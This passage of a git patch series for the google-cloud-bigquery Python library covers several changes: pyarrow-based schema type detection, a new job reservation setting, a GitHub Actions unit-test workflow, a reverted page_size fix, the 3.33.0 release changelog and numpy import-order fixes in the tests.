pyarrow.array(series) + if pyarrow.types.is_list(arrow_table.type): + # `pyarrow.ListType` + mode = "REPEATED" + type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.values.type.id) + + # For timezone-naive datetimes, pyarrow assumes the UTC timezone and adds + # it to such datetimes, causing them to be recognized as TIMESTAMP type. + # We thus additionally check the actual data to see if we need to overrule + # that and choose DATETIME instead. + # Note that this should only be needed for datetime values inside a list, + # since scalar datetime values have a proper Pandas dtype that allows + # distinguishing between timezone-naive and timezone-aware values before + # even requiring the additional schema augment logic in this method. 
+ if type == "TIMESTAMP": + valid_item = _first_array_valid(series) + if isinstance(valid_item, datetime) and valid_item.tzinfo is None: + type = "DATETIME" + else: + mode = "NULLABLE" # default mode + type = _pyarrow_helpers.arrow_scalar_ids_to_bq(arrow_table.type.id) + if type == "NUMERIC" and arrow_table.type.scale > 9: + type = "BIGNUMERIC" - if unknown_type_fields: - warnings.warn( - "Pyarrow could not determine the type of columns: {}.".format( - ", ".join(field.name for field in unknown_type_fields) - ) - ) + if type is not None: + return schema.SchemaField(name, type, mode) + else: return None - return augmented_schema - # pytype: enable=attribute-error - def dataframe_to_arrow(dataframe, bq_schema): """Convert pandas dataframe to Arrow table, using BigQuery schema. diff --git a/google/cloud/bigquery/schema.py b/google/cloud/bigquery/schema.py index 749b0a00e..1f1aab7a4 100644 --- a/google/cloud/bigquery/schema.py +++ b/google/cloud/bigquery/schema.py @@ -284,15 +284,13 @@ def name(self): return self._properties.get("name", "") @property - def field_type(self): + def field_type(self) -> str: """str: The type of the field. See: https://cloud.google.com/bigquery/docs/reference/rest/v2/tables#TableFieldSchema.FIELDS.type """ type_ = self._properties.get("type") - if type_ is None: # Shouldn't happen, but some unit tests do this. - return None return cast(str, type_).upper() @property @@ -397,20 +395,16 @@ def _key(self): Returns: Tuple: The contents of this :class:`~google.cloud.bigquery.schema.SchemaField`. """ - field_type = self.field_type.upper() if self.field_type is not None else None - - # Type can temporarily be set to None if the code needs a SchemaField instance, - # but has not determined the exact type of the field yet. 
- if field_type is not None: - if field_type == "STRING" or field_type == "BYTES": - if self.max_length is not None: - field_type = f"{field_type}({self.max_length})" - elif field_type.endswith("NUMERIC"): - if self.precision is not None: - if self.scale is not None: - field_type = f"{field_type}({self.precision}, {self.scale})" - else: - field_type = f"{field_type}({self.precision})" + field_type = self.field_type + if field_type == "STRING" or field_type == "BYTES": + if self.max_length is not None: + field_type = f"{field_type}({self.max_length})" + elif field_type.endswith("NUMERIC"): + if self.precision is not None: + if self.scale is not None: + field_type = f"{field_type}({self.precision}, {self.scale})" + else: + field_type = f"{field_type}({self.precision})" policy_tags = ( None if self.policy_tags is None else tuple(sorted(self.policy_tags.names)) diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index d6ea5df7e..d87c65581 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -1568,31 +1568,7 @@ def test_augment_schema_type_detection_succeeds(module_under_test): # set to "datetime64[ns]", and pyarrow converts that to pyarrow.TimestampArray. # We thus cannot expect to get a DATETIME date when converting back to the # BigQuery type. 
- - current_schema = ( - schema.SchemaField("bool_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("int_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("float_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("time_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("timestamp_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("date_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("bytes_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("string_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("numeric_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("bignumeric_field", field_type=None, mode="NULLABLE"), - ) - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - - # there should be no relevant warnings - unwanted_warnings = [ - warning for warning in warned if "Pyarrow could not" in str(warning) - ] - assert not unwanted_warnings - - # the augmented schema must match the expected - expected_schema = ( + expected_schemas = ( schema.SchemaField("bool_field", field_type="BOOL", mode="NULLABLE"), schema.SchemaField("int_field", field_type="INT64", mode="NULLABLE"), schema.SchemaField("float_field", field_type="FLOAT64", mode="NULLABLE"), @@ -1607,8 +1583,13 @@ def test_augment_schema_type_detection_succeeds(module_under_test): ), ) - by_name = operator.attrgetter("name") - assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1639,30 +1620,20 @@ def 
test_augment_schema_repeated_fields(module_under_test): ] ) - current_schema = ( - schema.SchemaField("string_array", field_type=None, mode="NULLABLE"), - schema.SchemaField("timestamp_array", field_type=None, mode="NULLABLE"), - schema.SchemaField("datetime_array", field_type=None, mode="NULLABLE"), - ) - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - - # there should be no relevant warnings - unwanted_warnings = [ - warning for warning in warned if "Pyarrow could not" in str(warning) - ] - assert not unwanted_warnings - # the augmented schema must match the expected - expected_schema = ( + expected_schemas = ( schema.SchemaField("string_array", field_type="STRING", mode="REPEATED"), schema.SchemaField("timestamp_array", field_type="TIMESTAMP", mode="REPEATED"), schema.SchemaField("datetime_array", field_type="DATETIME", mode="REPEATED"), ) - by_name = operator.attrgetter("name") - assert sorted(augmented_schema, key=by_name) == sorted(expected_schema, key=by_name) + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1681,24 +1652,21 @@ def test_augment_schema_type_detection_fails(module_under_test): }, ] ) - current_schema = [ - schema.SchemaField("status", field_type="STRING", mode="NULLABLE"), - schema.SchemaField("struct_field", field_type=None, mode="NULLABLE"), - schema.SchemaField("struct_field_2", field_type=None, mode="NULLABLE"), - ] - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - assert augmented_schema is None + expected_schemas = ( + schema.SchemaField("status", 
field_type="STRING", mode="NULLABLE"), + # Could not determine the type of these columns + None, + None, + ) - expected_warnings = [ - warning for warning in warned if "could not determine" in str(warning) - ] - assert len(expected_warnings) == 1 - warning_msg = str(expected_warnings[0]) - assert "pyarrow" in warning_msg.lower() - assert "struct_field" in warning_msg and "struct_field_2" in warning_msg + for col_name, expected_schema in zip(dataframe, expected_schemas): + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field == expected_schema @pytest.mark.skipif(pandas is None, reason="Requires `pandas`") @@ -1706,23 +1674,14 @@ def test_augment_schema_type_detection_fails_array_data(module_under_test): dataframe = pandas.DataFrame( data=[{"all_none_array": [None, float("NaN")], "empty_array": []}] ) - current_schema = [ - schema.SchemaField("all_none_array", field_type=None, mode="NULLABLE"), - schema.SchemaField("empty_array", field_type=None, mode="NULLABLE"), - ] - - with warnings.catch_warnings(record=True) as warned: - augmented_schema = module_under_test.augment_schema(dataframe, current_schema) - assert augmented_schema is None - - expected_warnings = [ - warning for warning in warned if "could not determine" in str(warning) - ] - assert len(expected_warnings) == 1 - warning_msg = str(expected_warnings[0]) - assert "pyarrow" in warning_msg.lower() - assert "all_none_array" in warning_msg and "empty_array" in warning_msg + for col_name in dataframe: + with warnings.catch_warnings(record=True) as warned: + schema_field = module_under_test._get_schema_by_pyarrow( + col_name, dataframe[col_name] + ) + assert warned == [] + assert schema_field is None @pytest.mark.skipif(isinstance(pyarrow, mock.Mock), reason="Requires `pyarrow`") diff --git a/tests/unit/test_schema.py b/tests/unit/test_schema.py index 3f2304a70..c63a8312c 
100644 --- a/tests/unit/test_schema.py +++ b/tests/unit/test_schema.py @@ -640,11 +640,6 @@ def test___repr__(self): expected = "SchemaField('field1', 'STRING', 'NULLABLE', None, None, (), None)" self.assertEqual(repr(field1), expected) - def test___repr__type_not_set(self): - field1 = self._make_one("field1", field_type=None) - expected = "SchemaField('field1', None, 'NULLABLE', None, None, (), None)" - self.assertEqual(repr(field1), expected) - def test___repr__evaluable_no_policy_tags(self): field = self._make_one("field1", "STRING", "REQUIRED", "Description") field_repr = repr(field) From cb646ceea172bf199f366ae0592546dff2d3bcb2 Mon Sep 17 00:00:00 2001 From: Lingqing Gan Date: Mon, 19 May 2025 12:10:12 -0700 Subject: [PATCH 105/202] feat: support job reservation (#2186) * feat: support job reservation * Update google/cloud/bigquery/job/base.py Co-authored-by: Chalmer Lowe --------- Co-authored-by: Chalmer Lowe --- google/cloud/bigquery/job/base.py | 32 +++++++++++++++++++++++ tests/unit/job/test_base.py | 42 +++++++++++++++++++++++++++++++ 2 files changed, 74 insertions(+) diff --git a/google/cloud/bigquery/job/base.py b/google/cloud/bigquery/job/base.py index eaa9d3460..5eb700ce7 100644 --- a/google/cloud/bigquery/job/base.py +++ b/google/cloud/bigquery/job/base.py @@ -224,6 +224,26 @@ def job_timeout_ms(self, value): else: self._properties.pop("jobTimeoutMs", None) + @property + def reservation(self): + """str: Optional. The reservation that job would use. + + User can specify a reservation to execute the job. If reservation is + not set, reservation is determined based on the rules defined by the + reservation assignments. The expected format is + projects/{project}/locations/{location}/reservations/{reservation}. + + Raises: + ValueError: If ``value`` type is not None or of string type. 
+ """ + return self._properties.setdefault("reservation", None) + + @reservation.setter + def reservation(self, value): + if value and not isinstance(value, str): + raise ValueError("Reservation must be None or a string.") + self._properties["reservation"] = value + @property def labels(self): """Dict[str, str]: Labels for the job. @@ -488,6 +508,18 @@ def location(self): """str: Location where the job runs.""" return _helpers._get_sub_prop(self._properties, ["jobReference", "location"]) + @property + def reservation_id(self): + """str: Name of the primary reservation assigned to this job. + + Note that this could be different than reservations reported in + the reservation field if parent reservations were used to execute + this job. + """ + return _helpers._get_sub_prop( + self._properties, ["statistics", "reservation_id"] + ) + def _require_client(self, client): """Check client or verify over-ride. diff --git a/tests/unit/job/test_base.py b/tests/unit/job/test_base.py index 22a0fa450..aa3d49ce3 100644 --- a/tests/unit/job/test_base.py +++ b/tests/unit/job/test_base.py @@ -443,6 +443,16 @@ def test_state(self): status["state"] = state self.assertEqual(job.state, state) + def test_reservation_id(self): + reservation_id = "RESERVATION-ID" + client = _make_client(project=self.PROJECT) + job = self._make_one(self.JOB_ID, client) + self.assertIsNone(job.reservation_id) + stats = job._properties["statistics"] = {} + self.assertIsNone(job.reservation_id) + stats["reservation_id"] = reservation_id + self.assertEqual(job.reservation_id, reservation_id) + def _set_properties_job(self): client = _make_client(project=self.PROJECT) job = self._make_one(self.JOB_ID, client) @@ -1188,15 +1198,18 @@ def test_fill_query_job_config_from_default(self): job_config = QueryJobConfig() job_config.dry_run = True job_config.maximum_bytes_billed = 1000 + job_config.reservation = "reservation_1" default_job_config = QueryJobConfig() default_job_config.use_query_cache = True 
default_job_config.maximum_bytes_billed = 2000 + default_job_config.reservation = "reservation_2" final_job_config = job_config._fill_from_default(default_job_config) self.assertTrue(final_job_config.dry_run) self.assertTrue(final_job_config.use_query_cache) self.assertEqual(final_job_config.maximum_bytes_billed, 1000) + self.assertEqual(final_job_config.reservation, "reservation_1") def test_fill_load_job_from_default(self): from google.cloud.bigquery import LoadJobConfig @@ -1204,15 +1217,18 @@ def test_fill_load_job_from_default(self): job_config = LoadJobConfig() job_config.create_session = True job_config.encoding = "UTF-8" + job_config.reservation = "reservation_1" default_job_config = LoadJobConfig() default_job_config.ignore_unknown_values = True default_job_config.encoding = "ISO-8859-1" + default_job_config.reservation = "reservation_2" final_job_config = job_config._fill_from_default(default_job_config) self.assertTrue(final_job_config.create_session) self.assertTrue(final_job_config.ignore_unknown_values) self.assertEqual(final_job_config.encoding, "UTF-8") + self.assertEqual(final_job_config.reservation, "reservation_1") def test_fill_from_default_conflict(self): from google.cloud.bigquery import QueryJobConfig @@ -1232,10 +1248,12 @@ def test_fill_from_empty_default_conflict(self): job_config = QueryJobConfig() job_config.dry_run = True job_config.maximum_bytes_billed = 1000 + job_config.reservation = "reservation_1" final_job_config = job_config._fill_from_default(default_job_config=None) self.assertTrue(final_job_config.dry_run) self.assertEqual(final_job_config.maximum_bytes_billed, 1000) + self.assertEqual(final_job_config.reservation, "reservation_1") @mock.patch("google.cloud.bigquery._helpers._get_sub_prop") def test__get_sub_prop_wo_default(self, _get_sub_prop): @@ -1338,3 +1356,27 @@ def test_job_timeout_properties(self): job_config.job_timeout_ms = None assert job_config.job_timeout_ms is None assert "jobTimeoutMs" not in 
job_config._properties + + def test_reservation_miss(self): + job_config = self._make_one() + self.assertEqual(job_config.reservation, None) + + def test_reservation_hit(self): + job_config = self._make_one() + job_config._properties["reservation"] = "foo" + self.assertEqual(job_config.reservation, "foo") + + def test_reservation_update_in_place(self): + job_config = self._make_one() + job_config.reservation = "bar" # update in place + self.assertEqual(job_config.reservation, "bar") + + def test_reservation_setter_invalid(self): + job_config = self._make_one() + with self.assertRaises(ValueError): + job_config.reservation = object() + + def test_reservation_setter(self): + job_config = self._make_one() + job_config.reservation = "foo" + self.assertEqual(job_config._properties["reservation"], "foo") From bf58ca5425809b08895eebfa74a8ef5c559a69ac Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Mon, 19 May 2025 16:54:24 -0400 Subject: [PATCH 106/202] ci: Update to the CI/CD pipeline via github workflow to help cut turn-around time (#2189) Update to the CI/CD pipeline via github workflow to help cut turn-around time. * added github workflow * changed the number of pytest-xdist workers from "auto" to "8" (based on local tests and discussion with Tim, choosing auto sometimes takes longer to run than choosing a smaller number. I suspect this is partly because for small or short tests the overhead needed to setup a worker exceeds the time savings of having extra workers). * modified numerous tests to explicitly include a project path to avoid an attempt to find the project by making an external call via the pydata-google-auth workflow (which opens an input and waits for response from the user that never comes). 
--- .github/workflows/unittest.yml | 89 ++++++++++++++++++++++++++++++++++ noxfile.py | 2 +- tests/unit/test_magics.py | 30 +++++++++++- 3 files changed, 118 insertions(+), 3 deletions(-) create mode 100644 .github/workflows/unittest.yml diff --git a/.github/workflows/unittest.yml b/.github/workflows/unittest.yml new file mode 100644 index 000000000..24c9ddbaf --- /dev/null +++ b/.github/workflows/unittest.yml @@ -0,0 +1,89 @@ +on: + pull_request: + branches: + - main +name: unittest +jobs: + unit: + # Use `ubuntu-latest` runner. + runs-on: ubuntu-latest + strategy: + matrix: + python: ['3.9', '3.11', '3.12', '3.13'] + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python }} + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run unit tests + env: + COVERAGE_FILE: .coverage-${{ matrix.python }} + run: | + nox -s unit-${{ matrix.python }} + - name: Upload coverage results + uses: actions/upload-artifact@v4 + with: + name: coverage-artifact-${{ matrix.python }} + path: .coverage-${{ matrix.python }} + include-hidden-files: true + + unit_noextras: + # Use `ubuntu-latest` runner. 
+ runs-on: ubuntu-latest + strategy: + matrix: + python: ['3.9', '3.13'] + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: ${{ matrix.python }} + - name: Install nox + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install nox + - name: Run unit_noextras tests + env: + COVERAGE_FILE: .coverage-unit-noextras-${{ matrix.python }} + run: | + nox -s unit_noextras-${{ matrix.python }} + - name: Upload coverage results + uses: actions/upload-artifact@v4 + with: + name: coverage-artifact-unit-noextras-${{ matrix.python }} + path: .coverage-unit-noextras-${{ matrix.python }} + include-hidden-files: true + + cover: + runs-on: ubuntu-latest + needs: + - unit + - unit_noextras + steps: + - name: Checkout + uses: actions/checkout@v4 + - name: Setup Python + uses: actions/setup-python@v5 + with: + python-version: "3.9" + - name: Install coverage + run: | + python -m pip install --upgrade setuptools pip wheel + python -m pip install coverage + - name: Download coverage results + uses: actions/download-artifact@v4 + with: + path: .coverage-results/ + - name: Report coverage results + run: | + find .coverage-results -type f -name '*.zip' -exec unzip {} \; + coverage combine .coverage-results/**/.coverage* + coverage report --show-missing --fail-under=100 diff --git a/noxfile.py b/noxfile.py index 1922a68a5..575bbb100 100644 --- a/noxfile.py +++ b/noxfile.py @@ -128,7 +128,7 @@ def default(session, install_extras=True): # Run py.test against the unit tests. 
session.run( "py.test", - "-n=auto", + "-n=8", "--quiet", "-W default::PendingDeprecationWarning", "--cov=google/cloud/bigquery", diff --git a/tests/unit/test_magics.py b/tests/unit/test_magics.py index 0f1e030cb..a9a12283b 100644 --- a/tests/unit/test_magics.py +++ b/tests/unit/test_magics.py @@ -480,6 +480,7 @@ def test_bigquery_magic_without_optional_arguments(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -831,6 +832,7 @@ def test_bigquery_magic_w_max_results_query_job_results_fails(monkeypatch): assert close_transports.called +@pytest.mark.usefixtures("ipython_interactive") def test_bigquery_magic_w_table_id_invalid(monkeypatch): ip = IPython.get_ipython() monkeypatch.setattr(bigquery, "bigquery_magics", None) @@ -861,6 +863,7 @@ def test_bigquery_magic_w_table_id_invalid(monkeypatch): assert "Traceback (most recent call last)" not in output +@pytest.mark.usefixtures("ipython_interactive") def test_bigquery_magic_w_missing_query(monkeypatch): ip = IPython.get_ipython() monkeypatch.setattr(bigquery, "bigquery_magics", None) @@ -1354,6 +1357,8 @@ def test_bigquery_magic_w_progress_bar_type_w_context_setter(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1383,6 +1388,8 @@ def test_bigquery_magic_with_progress_bar_type(monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + with run_query_patch as run_query_mock: ip.run_cell_magic( "bigquery", "--progress_bar_type=tqdm_gui", "SELECT 17 as num" @@ -1565,6 +1572,8 @@ def 
test_bigquery_magic_with_string_params(ipython_ns_cleanup, monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1605,6 +1614,8 @@ def test_bigquery_magic_with_dict_params(ipython_ns_cleanup, monkeypatch): run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1689,6 +1700,7 @@ def test_bigquery_magic_with_option_value_incorrect(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" sql = "SELECT @foo AS foo" @@ -1719,6 +1731,8 @@ def test_bigquery_magic_with_dict_params_negative_value( run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1760,6 +1774,8 @@ def test_bigquery_magic_with_dict_params_array_value(ipython_ns_cleanup, monkeyp run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1801,6 +1817,8 @@ def test_bigquery_magic_with_dict_params_tuple_value(ipython_ns_cleanup, monkeyp run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) + magics.context.project = "unit-test-project" + query_job_mock = mock.create_autospec( google.cloud.bigquery.job.QueryJob, instance=True ) @@ -1852,6 +1870,7 @@ def test_bigquery_magic_valid_query_in_existing_variable( 
magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" ipython_ns_cleanup.append((ip, "custom_query")) ipython_ns_cleanup.append((ip, "query_results_df")) @@ -1892,6 +1911,7 @@ def test_bigquery_magic_nonexisting_query_variable(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True @@ -1917,7 +1937,7 @@ def test_bigquery_magic_empty_query_variable_name(monkeypatch): magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) - + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True ) @@ -1940,6 +1960,7 @@ def test_bigquery_magic_query_variable_non_string(ipython_ns_cleanup, monkeypatc magics.context.credentials = mock.create_autospec( google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" run_query_patch = mock.patch( "google.cloud.bigquery.magics.magics._run_query", autospec=True @@ -1968,9 +1989,14 @@ def test_bigquery_magic_query_variable_not_identifier(monkeypatch): google.auth.credentials.Credentials, instance=True ) + magics.context.project = "unit-test-project" cell_body = "$123foo" # 123foo is not valid Python identifier - with io.capture_output() as captured_io: + run_query_patch = mock.patch( + "google.cloud.bigquery.magics.magics._run_query", autospec=True + ) + + with run_query_patch, io.capture_output() as captured_io: ip.run_cell_magic("bigquery", "", cell_body) # If "$" prefixes a string that is not a Python identifier, we do not treat such From 06ee3df6c5346e5041ebab80da8b2a299378444c Mon Sep 17 00:00:00 2001 From: Chelsea Lin Date: Mon, 19 May 2025 16:02:21 -0700 Subject: [PATCH 
107/202] Revert "fix: table iterator should not use bqstorage when page_size is not None (#2154)" (#2191) This reverts commit e89a707b162182ededbf94cc9a0f7594bc2be475. --- google/cloud/bigquery/table.py | 11 ++--------- tests/unit/test_dbapi_cursor.py | 1 - tests/unit/test_table.py | 7 ------- 3 files changed, 2 insertions(+), 17 deletions(-) diff --git a/google/cloud/bigquery/table.py b/google/cloud/bigquery/table.py index e084468f6..3f472c490 100644 --- a/google/cloud/bigquery/table.py +++ b/google/cloud/bigquery/table.py @@ -1897,11 +1897,6 @@ def total_bytes_processed(self) -> Optional[int]: """total bytes processed from job statistics, if present.""" return self._total_bytes_processed - @property - def page_size(self) -> Optional[int]: - """The maximum number of rows in each page of results from this request, if present.""" - return self._page_size - def _is_almost_completely_cached(self): """Check if all results are completely cached. @@ -1953,7 +1948,7 @@ def _should_use_bqstorage(self, bqstorage_client, create_bqstorage_client): if self._is_almost_completely_cached(): return False - if self.max_results is not None or self.page_size is not None: + if self.max_results is not None: return False try: @@ -2023,9 +2018,7 @@ def _maybe_warn_max_results( bqstorage_client: The BigQuery Storage client intended to use for downloading result rows. 
""" - if bqstorage_client is not None and ( - self.max_results is not None or self.page_size is not None - ): + if bqstorage_client is not None and self.max_results is not None: warnings.warn( "Cannot use bqstorage_client if max_results is set, " "reverting to fetching data with the REST endpoint.", diff --git a/tests/unit/test_dbapi_cursor.py b/tests/unit/test_dbapi_cursor.py index cba9030de..6fca4cec0 100644 --- a/tests/unit/test_dbapi_cursor.py +++ b/tests/unit/test_dbapi_cursor.py @@ -161,7 +161,6 @@ def _mock_rows( mock_rows, ) mock_rows.max_results = None - mock_rows.page_size = None type(mock_rows).job_id = mock.PropertyMock(return_value="test-job-id") type(mock_rows).location = mock.PropertyMock(return_value="test-location") type(mock_rows).num_dml_affected_rows = mock.PropertyMock( diff --git a/tests/unit/test_table.py b/tests/unit/test_table.py index 92fa0e2ec..4791c6511 100644 --- a/tests/unit/test_table.py +++ b/tests/unit/test_table.py @@ -2858,13 +2858,6 @@ def test__should_use_bqstorage_returns_false_if_max_results_set(self): ) self.assertFalse(result) - def test__should_use_bqstorage_returns_false_if_page_size_set(self): - iterator = self._make_one(page_size=10, first_page_response=None) # not cached - result = iterator._should_use_bqstorage( - bqstorage_client=None, create_bqstorage_client=True - ) - self.assertFalse(result) - def test__should_use_bqstorage_returns_false_w_warning_if_missing_dependency(self): iterator = self._make_one(first_page_response=None) # not cached From b140fca726488106693aaf14695cb7bb9b4b2796 Mon Sep 17 00:00:00 2001 From: "release-please[bot]" <55107282+release-please[bot]@users.noreply.github.com> Date: Mon, 19 May 2025 16:27:29 -0700 Subject: [PATCH 108/202] chore(main): release 3.33.0 (#2180) Co-authored-by: release-please[bot] <55107282+release-please[bot]@users.noreply.github.com> Co-authored-by: Lingqing Gan --- CHANGELOG.md | 15 +++++++++++++++ google/cloud/bigquery/version.py | 2 +- 2 files changed, 16 
insertions(+), 1 deletion(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index ff1bd7acc..2f7166d44 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -5,6 +5,21 @@ [1]: https://pypi.org/project/google-cloud-bigquery/#history +## [3.33.0](https://github.com/googleapis/python-bigquery/compare/v3.32.0...v3.33.0) (2025-05-19) + + +### Features + +* Add ability to set autodetect_schema query param in update_table ([#2171](https://github.com/googleapis/python-bigquery/issues/2171)) ([57f940d](https://github.com/googleapis/python-bigquery/commit/57f940d957613b4d80fb81ea40a1177b73856189)) +* Add dtype parameters to to_geodataframe functions ([#2176](https://github.com/googleapis/python-bigquery/issues/2176)) ([ebfd0a8](https://github.com/googleapis/python-bigquery/commit/ebfd0a83d43bcb96f65f5669437220aa6138b766)) +* Support job reservation ([#2186](https://github.com/googleapis/python-bigquery/issues/2186)) ([cb646ce](https://github.com/googleapis/python-bigquery/commit/cb646ceea172bf199f366ae0592546dff2d3bcb2)) + + +### Bug Fixes + +* Ensure AccessEntry equality and repr uses the correct `entity_type` ([#2182](https://github.com/googleapis/python-bigquery/issues/2182)) ([0217637](https://github.com/googleapis/python-bigquery/commit/02176377d5e2fc25b5cd4f46aa6ebfb1b6a960a6)) +* Ensure SchemaField.field_dtype returns a string ([#2188](https://github.com/googleapis/python-bigquery/issues/2188)) ([7ec2848](https://github.com/googleapis/python-bigquery/commit/7ec2848379d5743bbcb36700a1153540c451e0e0)) + ## [3.32.0](https://github.com/googleapis/python-bigquery/compare/v3.31.0...v3.32.0) (2025-05-12) diff --git a/google/cloud/bigquery/version.py b/google/cloud/bigquery/version.py index fe13d2477..8304ac025 100644 --- a/google/cloud/bigquery/version.py +++ b/google/cloud/bigquery/version.py @@ -12,4 +12,4 @@ # See the License for the specific language governing permissions and # limitations under the License. 
-__version__ = "3.32.0" +__version__ = "3.33.0" From a3d6bf3a8d674984957997e965a811fa58dfc4a6 Mon Sep 17 00:00:00 2001 From: Chalmer Lowe Date: Tue, 20 May 2025 10:21:22 -0400 Subject: [PATCH 109/202] ci: Import numpy before pyarrow in tests to resolve import warning (#2187) * Fix: Import numpy before pyarrow in tests to resolve import warning A `PytestDeprecationWarning` was occurring in several test files because `pyarrow`, when imported by `pytest.importorskip`, would fail to import `numpy.core.multiarray`. This change addresses the warning by explicitly importing `numpy` before `pytest.importorskip("pyarrow", ...)` in the affected test files. This ensures that numpy is fully initialized before pyarrow attempts to use it, resolving the underlying import error. I also updated the test execution to use `nox -s unit`, which correctly sets up the test environment and dependencies, allowing the tests to pass and confirm the warning is resolved. Pre-existing failures in `tests/unit/test_magics.py` are unrelated to this change. * Update tests/unit/test__pyarrow_helpers.py * revisions to numpy handling * adds import or skip commands to accompany pyarrow import or skips * Update tests/unit/test__pandas_helpers.py * updates an import step and restores gc import * Updates magics.context and removes unneeded? 
reference to numpy/pyarrow --------- Co-authored-by: google-labs-jules[bot] <161369871+google-labs-jules[bot]@users.noreply.github.com> --- noxfile.py | 3 +-- testing/constraints-3.9.txt | 1 + tests/unit/test__pandas_helpers.py | 1 + tests/unit/test__pyarrow_helpers.py | 2 +- tests/unit/test_dbapi__helpers.py | 1 + tests/unit/test_magics.py | 5 +++++ tests/unit/test_table.py | 28 ++++++++++++++++++++++++++-- tests/unit/test_table_arrow.py | 3 ++- 8 files changed, 38 insertions(+), 6 deletions(-) diff --git a/noxfile.py b/noxfile.py index 575bbb100..6807b7ee4 100644 --- a/noxfile.py +++ b/noxfile.py @@ -163,8 +163,7 @@ def unit_noextras(session): # so that it continues to be an optional dependency. # https://github.com/googleapis/python-bigquery/issues/1877 if session.python == UNIT_TEST_PYTHON_VERSIONS[0]: - session.install("pyarrow==4.0.0") - + session.install("pyarrow==4.0.0", "numpy==1.20.2") default(session, install_extras=False) diff --git a/testing/constraints-3.9.txt b/testing/constraints-3.9.txt index 60a155f0d..f61c0cf09 100644 --- a/testing/constraints-3.9.txt +++ b/testing/constraints-3.9.txt @@ -20,6 +20,7 @@ ipykernel==6.2.0 opentelemetry-api==1.1.0 opentelemetry-instrumentation==0.20b0 opentelemetry-sdk==1.1.0 +numpy==1.20.2 packaging==24.2.0 pandas==1.3.0 pandas-gbq==0.26.1 diff --git a/tests/unit/test__pandas_helpers.py b/tests/unit/test__pandas_helpers.py index d87c65581..bc94f5f54 100644 --- a/tests/unit/test__pandas_helpers.py +++ b/tests/unit/test__pandas_helpers.py @@ -1856,6 +1856,7 @@ def test__download_table_bqstorage_shuts_down_workers( Make sure that when the top-level iterator goes out of scope (is deleted), the child threads are also stopped. 
